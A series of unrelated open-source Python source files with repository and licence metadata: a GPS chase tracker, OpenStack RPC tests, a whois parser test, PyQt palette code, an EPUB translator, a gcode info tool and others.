return data[rel_ancestor][tag]
if rel_ancestor == '.':
break
ancestor = os.path.dirname(ancestor)
return
for dirname, _, files in os.walk(root):
# Proofing against windows casing oddities.
owners_file_names = [f for f in files if f.upper() == 'OWNERS']
rel_dirname = uniform_path_format(os.path.relpath(dirname, root))
if owners_file_names or include_subdirs:
if owners_file_names:
owners_full_path = os.path.join(dirname, owners_file_names[0])
data[rel_dirname] = parse(owners_full_path)
else:
data[rel_dirname] = {}
for tag in ('component', 'os', 'team'):
if not tag in data[rel_dirname]:
ancestor_tag = nearest_ancestor_tag(dirname, tag)
if ancestor_tag:
data[rel_dirname][tag] = ancestor_tag
return data
|
richrr/coremicro
|
src/core/process_data.py
|
Python
|
gpl-2.0
| 2,807
| 0
|
# Copyright 2016, 2017 Richard Rodrigues, Nyle Rodgers, Mark Williams,
# Virginia Tech
#
# This file is part of Coremic.
#
# Coremic is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Found
|
ation, either version 3 of the License, or
# (at your option) any later version.
#
# Coremic is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU
|
General Public License
# along with Coremic. If not, see <http://www.gnu.org/licenses/>.
from pval import getpval, correct_pvalues
from otu import Otu
def process(inputs, cfg):
"""Finds the core OTUs"""
interest_ids = [otu for g in cfg['group']
for otu in inputs['mapping_dict'][g]]
i_indexes = [i for i, id in enumerate(inputs['filtered_data'].SampleIds)
if id in interest_ids]
otus = [Otu(vals, name, cfg['min_abundance'], i_indexes)
for vals, name, md in inputs['filtered_data'].iterObservations()]
pvals = list()
for otu in otus:
pval = getpval(otu)
otu.pval = pval
pvals.append(pval)
for otu, corrected_pval in zip(otus,
correct_pvalues(pvals, cfg['p_val_adj'])):
otu.corrected_pval = corrected_pval
# Filter down to the core
return [otu for otu in otus
if (otu.corrected_pval <= cfg['max_p'] and
otu.interest_frac >= cfg['min_frac'] and
otu.out_frac <= cfg['max_out_presence'])]
def format_results(res, cfg):
"""Format the result data as a tsv"""
# Summary of the inputs given
inputs = ['#Factor: ' + cfg['factor'],
'Group: ' + ', '.join(cfg['group']),
'Max Corrected p-val: %f' % cfg['max_p'],
'Min Presence: %f' % cfg['min_frac'],
'Max Out Presence: %f' % cfg['max_out_presence'],
'Min Abundance: %f' % cfg['min_abundance'],
'Correction Type: ' + cfg['p_val_adj']]
# Header for results
header = ['#OTU', 'Pval', 'Corrected Pval', 'Interest Group Presence',
'Out Group Presence']
# Combine inputs, header, and information from core OTUs
return to_tsv([inputs, header] +
[[otu.name, otu.pval, otu.corrected_pval, otu.interest_frac,
otu.out_frac] for otu in list(sorted(res))])
def to_tsv(values):
"""Formats the given list of lists as a tsv string. str() is called on
all items to convert them to strings"""
return '\n'.join(map(lambda r: '\t'.join(map(str, r)), values))
|
huyphan/pyyawhois
|
test/record/parser/test_response_whois_tonic_to_status_available.py
|
Python
|
mit
| 2,350
| 0.007234
|
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# spec/fixtures/responses/whois.tonic.to/status_available
#
# and regenerate the tests with the following script
#
# $ scripts/generate_tests.py
#
from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois
class TestWhoisTonicToStatusAvailable(object):
def setUp(self):
fixture_path = "spec/fixtures/responses/whois.tonic.to/status_available.txt"
host = "whois.tonic.to"
part = yawhois.record.Part(open(fixture_path, "r").read(), host)
self.record = yawhois.record.Record(None, [part])
def test_status(self):
eq_(self.record.status, 'available')
def test_available(self):
eq_(self.record.available, True)
def test_domain(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.domain)
def test_response_incomplete(self):
eq_(self.record.response_incomplete, False)
def test_nameservers(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.nameservers)
def test_admin_contacts(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.admin_contacts)
d
|
ef test_registered(self):
eq_(self.record.registered, False)
def test_created_on(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.created_on)
def test_registrar(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.registrar)
def test_registrant_contacts(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.registrant_contacts)
def test_technical_contac
|
ts(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.technical_contacts)
def test_updated_on(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.updated_on)
def test_domain_id(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.domain_id)
def test_expires_on(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.expires_on)
def test_disclaimer(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.disclaimer)
|
projecthorus/chasetracker
|
ChaseTrackerNoGUI.py
|
Python
|
apache-2.0
| 6,363
| 0.006129
|
#!/usr/bin/env python
#
# ChaseTracker 2.0 No GUI Version
#
# Copyright 2015 Mark Jessop <vk5qi@rfhead.net>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you ma
|
y not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing per
|
missions and
# limitations under the License.
#
import urllib2, json, ConfigParser, sys, time, serial
from threading import Thread
from base64 import b64encode
from hashlib import sha256
from datetime import datetime
from socket import *
# Attempt to read in config file
config = ConfigParser.RawConfigParser()
config.read("chasetracker.conf")
callsign = config.get("General","callsign")
update_rate = int(config.get("General","update_rate"))
serial_port = config.get("GPS","serial_port")
serial_baud = int(config.get("GPS","serial_baud"))
speed_cap = int(config.get("GPS","speed_cap"))
# Position Variables
position_valid = False
lat = -34.0
lon = 138.0
alt = 0
speed = 0 # m/s
def updateTerminal():
positionText = "Lat/Long: %.5f, %.5f \tSpeed: %d kph \tAlt: %d m" % (lat,lon,speed*3.6,alt)
print positionText
# Courtesy of https://github.com/Knio/pynmea2/
import re
def dm_to_sd(dm):
'''
Converts a geographic coordiante given in "degres/minutes" dddmm.mmmm
format (ie, "12319.943281" = 123 degrees, 19.953281 minutes) to a signed
decimal (python float) format
'''
# '12319.943281'
if not dm or dm == '0':
return 0.
d, m = re.match(r'^(\d+)(\d\d\.\d+)$', dm).groups()
return float(d) + float(m) / 60
# We currently only recognise GPGGA and GPRMC
def parseNMEA(data):
global lat,lon,speed,alt,position_valid
if "$GPRMC" in data:
gprmc = data.split(",")
gprmc_lat = dm_to_sd(gprmc[3])
gprmc_latns = gprmc[4]
gprmc_lon = dm_to_sd(gprmc[5])
gprmc_lonew = gprmc[6]
gprmc_speed = float(gprmc[7])
if gprmc_latns == "S":
lat = gprmc_lat*-1.0
else:
lat = gprmc_lat
if gprmc_lon == "W":
lon = gprmc_lon*-1.0
else:
lon = gprmc_lon
speed = min(110*0.27778, gprmc_speed*0.51444)
updateTerminal()
if "$GPGGA" in data:
gpgga = data.split(",")
gpgga_lat = dm_to_sd(gpgga[2])
gpgga_latns = gpgga[3]
gpgga_lon = dm_to_sd(gpgga[4])
gpgga_lonew = gpgga[5]
gpgga_fixstatus = gpgga[6]
alt = float(gpgga[9])
if gpgga_latns == "S":
lat = gpgga_lat*-1.0
else:
lat = gpgga_lat
if gpgga_lon == "W":
lon = gpgga_lon*-1.0
else:
lon = gpgga_lon
if gpgga_fixstatus == 0:
position_valid = False
else:
position_valid = True
# Habitat Upload Stuff, from https://raw.githubusercontent.com/rossengeorgiev/hab-tools/master/spot2habitat_chase.py
callsign_init = False
url_habitat_uuids = "http://habitat.habhub.org/_uuids?count=%d"
url_habitat_db = "http://habitat.habhub.org/habitat/"
uuids = []
def ISOStringNow():
return "%sZ" % datetime.utcnow().isoformat()
def postData(doc):
# do we have at least one uuid, if not go get more
if len(uuids) < 1:
fetch_uuids()
# add uuid and uploade time
doc['_id'] = uuids.pop()
doc['time_uploaded'] = ISOStringNow()
data = json.dumps(doc)
headers = {
'Content-Type': 'application/json; charset=utf-8',
'Referer': url_habitat_db,
}
print("Posting doc to habitat\n%s" % json.dumps(doc, indent=2))
req = urllib2.Request(url_habitat_db, data, headers)
return urllib2.urlopen(req).read()
def fetch_uuids():
while True:
try:
resp = urllib2.urlopen(url_habitat_uuids % 10).read()
data = json.loads(resp)
except urllib2.HTTPError, e:
print("Unable to fetch uuids. Retrying in 10 seconds...");
time.sleep(10)
continue
print("Received a set of uuids.")
uuids.extend(data['uuids'])
break;
def init_callsign():
doc = {
'type': 'listener_information',
'time_created' : ISOStringNow(),
'data': { 'callsign': callsign }
}
while True:
try:
resp = postData(doc)
print("Callsign initialized.")
break;
except urllib2.HTTPError, e:
print("Unable initialize callsign. Retrying in 10 seconds...");
time.sleep(10)
continue
def uploadPosition():
# initialize call sign (one time only)
global callsign_init
if not callsign_init:
init_callsign()
callsign_init = True
doc = {
'type': 'listener_telemetry',
'time_created': ISOStringNow(),
'data': {
'callsign': callsign,
'chase': True,
'latitude': lat,
'longitude': lon,
'altitude': alt,
'speed': speed,
}
}
# post position to habitat
try:
postData(doc)
except urllib2.HTTPError, e:
print("Unable to upload data!")
return
print("Uploaded Data at: %s" % ISOStringNow())
def uploadNow():
if position_valid:
try:
uploadPosition()
except:
pass
# Start UDP Listener Thread
serial_running = True
lastUploadTime = time.time()
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
try:
ser = serial.Serial(port=serial_port,baudrate=serial_baud,timeout=5)
except Exception as e:
print("Serial Port Error: %s" % e)
sys.exit(1)
while serial_running:
data = ser.readline()
try:
parseNMEA(data)
except Exception as e:
print str(e)
print "Failed to Parse NMEA: " + data
if (time.time() - lastUploadTime)>update_rate:
uploadNow()
lastUploadTime = time.time()
ser.close()
|
jmarcelogimenez/petroSym
|
petroSym/utils.py
|
Python
|
gpl-2.0
| 11,739
| 0.007837
|
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 19 17:08:36 2015
@author: jgimenez
"""
from PyQt4 import QtGui, QtCore
import os
import time
import subprocess
types = {}
types['p'] = 'scalar'
types['U'] = 'vector'
types['p_rgh'] = 'scalar'
types['k'] = 'scalar'
types['epsilon'] = 'scalar'
types['omega'] = 'scalar'
types['alpha'] = 'scalar'
types['nut'] = 'scalar'
types['nuTilda'] = 'scalar'
types['nuSgs'] = 'scalar'
unknowns = ['U','p','p_rgh','alpha','k','nuSgs','epsilon','omega','nuTilda','nut']
def drange(start, stop, step):
r = start
while r < stop:
yield r
r += step
def command_window(palette):
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
|
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.S
|
olidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
|
TriumphLLC/FashionProject
|
modules/operators/tools/detail_tool/detail_tool.py
|
Python
|
gpl-3.0
| 579
| 0.02403
|
import bpy
from fashion_project.modules.draw.detail_tool.detail_tool import ToolDetail
class FP_DetailTool(bpy.types.Operator):
|
'''
Инструмент деталь:
создает замкнутый контур
'''
bl_idname = "fp.detail_tool"
bl_label = "FP_DetailTool"
@classmethod
def poll(cls, context):
return ToolDetail().poll(context)
def execute(self, context):
ToolDetail().create(context)
return {'FINISHED'}
def register():
bpy.utils.register_class(FP_DetailTool)
def unregister():
bpy.ut
|
ils.unregister_class(FP_DetailTool)
|
rcbops/nova-buildpackage
|
nova/tests/rpc/test_carrot.py
|
Python
|
apache-2.0
| 1,534
| 0
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for remote procedure calls using carr
|
ot
"""
from nova import log as logging
from nova.rpc import impl_carrot
from nova.tests.rpc import common
LOG = logging.getLogger('nova.tests.rpc')
|
class RpcCarrotTestCase(common._BaseRpcTestCase):
def setUp(self):
self.rpc = impl_carrot
super(RpcCarrotTestCase, self).setUp()
def tearDown(self):
super(RpcCarrotTestCase, self).tearDown()
def test_connectionpool_single(self):
"""Test that ConnectionPool recycles a single connection."""
conn1 = self.rpc.ConnectionPool.get()
self.rpc.ConnectionPool.put(conn1)
conn2 = self.rpc.ConnectionPool.get()
self.rpc.ConnectionPool.put(conn2)
self.assertEqual(conn1, conn2)
|
beagles/neutron_hacking
|
neutron/tests/unit/linuxbridge/test_rpcapi.py
|
Python
|
apache-2.0
| 5,482
| 0
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for linuxbridge rpc
"""
import mock
from oslo.config import cfg
from neutron.agent import rpc as agent_rpc
from neutron.common import topics
from neutron.openstack.common import context
from neutron.plugins.linuxbridge import lb_neutron_plugin as plb
from neutron.tests import base
class rpcApiTestCase(base.BaseTestCase):
def _test_lb_api(self, rpcapi, topic, method, rpc_method, fanout,
expected_msg=None, **kwargs):
ctxt = context.RequestContext('fake_user', 'fake_project')
expected_retval = 'foo' if method == 'call' else None
if not expected_msg:
expected_msg = kwargs.copy()
with mock.patch.object(rpcapi.client, 'prepare') as mock_prepare:
rpc_method_mock = getattr(mock_prepare.return_value, rpc_method)
rpc_method_mock.return_value = expected_retval
retval = getattr(rpcapi, method)(ctxt, **kwargs)
self.assertEqual(expected_retval, retval)
expected_prepare_args = {}
if fanout:
expected_prepare_args['fanout'] = fanout
if topic != topics.PLUGIN:
expected_prepare_args['topic'] = topic
mock_prepare.assert_called_with(**expected_prepare_args)
rpc_method_mock = getattr(mock_prepare.return_value, rpc_method)
rpc_method_mock.assert_called_with(
ctxt,
method,
**expected_msg)
def test_delete_network(self):
rpcapi = plb.AgentNotifierApi(topics.AGENT)
self._test_lb_api(rpcapi,
topics.get_topic_name(topics.AGENT,
topics.NETWORK,
topics.DELETE),
'network_delete', rpc_method='cast', fanout=True,
network_id='fake_request_spec')
def test_port_update(self):
cfg.CONF.set_override('rpc_support_old_agents', False, 'AGENT')
rpcapi = plb.AgentNotifierApi(topics.AGENT)
expected_msg = {'port': 'fake_port',
'network_type': 'vlan',
'physical_network': 'fake_net',
'segmentation_id': 'fake_vlan_id'}
self._test_lb_api(rpcapi,
topics.get_topic_name(topics.AGENT,
topics.PORT,
topics.UPDATE),
'port_update', rpc_method='cast', fanout=True,
expected_msg=expected_msg,
port='fake_port',
physical_network='fake_net',
vlan_id='fake_vlan_id')
def test_port_update_old_agent(self):
cfg.CONF.set_override('rpc_support_old_agents', True, 'AGENT')
rpcapi = plb.AgentNotifierApi(topics.AGENT)
expected_msg = {'port': 'fake_port',
'network_type': 'vlan',
'physical_network': 'fake_net',
'segmentation_id': 'fake_vlan_id',
'vlan_id': 'fake_vlan_id'}
self._test_lb_api(rpcapi,
topics.get_topic_name(topics.AGENT,
topics.PORT,
topics.UPDATE),
'port_update', rpc_method='cast', fanout=True,
expected_msg=expected_msg,
port='fake_port',
physical_network='fake_net',
vlan_id='fake_vlan_id')
def test_device_details(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_lb_api(rpcapi, topics.PLUGIN,
'get_device_details', rpc_method='call',
fanout=False,
device='fake_device',
agent_id='fake_agent_id')
def test_update_device_down(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_lb_api(rpcapi, topics.PLUGIN,
'update_device_down', rpc_method='call',
fanout=False,
device='fake_device',
|
a
|
gent_id='fake_agent_id',
host='fake_host')
def test_update_device_up(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_lb_api(rpcapi, topics.PLUGIN,
'update_device_up', rpc_method='call',
fanout=False,
device='fake_device',
agent_id='fake_agent_id',
host='fake_host')
|
tcalmant/demo-ipopo-qt
|
android/compass/__init__.py
|
Python
|
gpl-2.0
| 439
| 0
|
#!/usr/bin/python
# -- Content-Encoding: UTF-8 --
"""
Compass demo package
:author: Thomas Calmant
:copyright: Copyright 2013, isandlaTech
:license: GP
|
Lv2
:version: 0.1
:status: Alpha
"""
# Module version
__version_info__ = (0, 1, 0)
__version__ = ".".join(map(str, __version_info__))
# Documentation strings format
__docformat__ = "restruc
|
turedtext en"
# ------------------------------------------------------------------------------
|
ZloVechno/dummy-agent
|
functial/__init__.py
|
Python
|
gpl-3.0
| 621
| 0.030596
|
#! /usr/bin/python
# Module:
# Author: Maxim Borisyak, 2014
import functools
partial = functools.partial
from pattern import MatchError
fr
|
om pattern import case
from pattern import to_pattern
# Type patterns
from pattern import a_class
from pattern import a_str
from pattern import a_float
from pattern import an_int
# General patterns
from pattern import some
from pattern import otherwise
from pattern import constant
from match import match
from matc
|
h import match_f
from match import case_f
from match import match_method
from match import case_method
from match import merge_matches
from match import to_match
|
futurepr0n/Books-solutions
|
Python-For-Everyone-Horstmann/Chapter6-Lists/R6.1A.py
|
Python
|
mit
| 203
| 0.009852
|
# Given the list va
|
lues = [] , write code that fills the list with each set of numbers below.
# a.1 2 3 4 5 6 7 8 9 10
list = []
for i in range(1
|
1):
list.append(i)
print(list)
|
peterFran/LanguageListCreator
|
langtools/translator/EPUBTranslation.py
|
Python
|
mit
| 1,136
| 0.001761
|
from ebooklib import epub
from bs4 import BeautifulSoup
from nltk.tokenize import RegexpTokenizer
from langtools.translator.TextTranslation import TextTranslation
class EPUB(object):
"""docstring for EPUB"""
def __init__(self, book_location):
book = epub.read_epub(book_location)
# Filter out pictures and the like
self.chapters = [item for item in book.items if 'is_chapter' in dir(item)]
self.title = book.title
def get_chapter(self, number):
# pass xml to ChapterTranslationList
|
and return it
xml_chapter = self.chapters[
|
number].get_content().decode('utf-8')
chapter = BeautifulSoup(xml_chapter).get_text()
# Tokenize the text
tokenizer = RegexpTokenizer(r'\w+')
return tokenizer.tokenize(chapter)
class EPUBTranslation(EPUB):
"""docstring for EpubTranslation"""
def get_chapter(self, number):
# pass xml to ChapterTranslationList and return it
xml_chapter = self.chapters[number].get_content().decode('utf-8')
chapter = BeautifulSoup(xml_chapter).get_text()
return TextTranslation(chapter)
|
ErwinRieger/ddprint
|
host/ddtool.py
|
Python
|
gpl-2.0
| 2,998
| 0.004671
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#/*
# This file is part of ddprint - a 3D printer firmware.
#
# Copyright 2020 erwin.rieger@ibrieger.de
#
# ddprint is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ddprint is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ddprint. If not, see <http://www.gnu.org/licenses/>.
#*/
import pprint, sys, os
import argparse, time
# import ddprintutil as util, gcodeparser, packedvalue, ddhome
# import ddtest
# from ddplanner import Planner
# from ddprinter import Printer, RxTimeout
def filamentTool(fn):
assert(0)
#
# Print some info's about gcode
#
def gcodeTool(fn):
i = 0
settings = argparse.Namespace(generator="")
for line in open(fn).readlines():
l = line.strip()
if l.startswith(";"):
|
tokens = l.split()
ti = 1
while ti < len(tokens):
token = tokens[ti].lower()
valtokens = token.split(",")
if len(valtokens) >= 2:
v = valtokens[1:]
|
while ti+1 < len(tokens):
v.append(tokens[ti])
ti += 1
settings.__setattr__(valtokens[0].lower(), v)
break
if token == "generated":
settings.generator = l
break
ti += 1
i += 1
# print "gcode settings:",
# pprint.pprint(settings)
# print "lh:", settings.layerheight
# print "starting:", settings.startinggcode
lh = float(settings.layerheight[0])
ew = float(settings.extruderwidth[0])
spd = float(settings.defaultspeed[0]) / 60
xyspd = float(settings.rapidxyspeed[0]) / 60
zspd = float(settings.rapidzspeed[0]) / 60
print("\nGCode info's:")
print("-------------")
print("Model (STL) : %s" % settings.applytomodels)
print("Generator : %s" % settings.generator)
print("LayerHeight : %.2f mm" % lh)
print("ExtrudeWidth: %.2f mm" % ew)
print("Speed : %.2f mm/s" % spd)
print("Travelspeed : XY: %.2f Z: %.2f mm/s" % (xyspd, zspd))
print("starting cod: \n %s" % "".join(settings.startinggcode).replace(";", "\n ;"))
print("\nMax flowrate: %.2f mm³/s" % (lh*ew*spd))
if len(sys.argv) == 2:
fn = sys.argv[1]
ext = os.path.splitext(fn)[-1]
if ext == ".json":
# filamenttool
filamentTool(fn)
elif ext == ".gcode":
# gcodetool
gcodeTool(fn)
else:
print("unknown file/extension", ext)
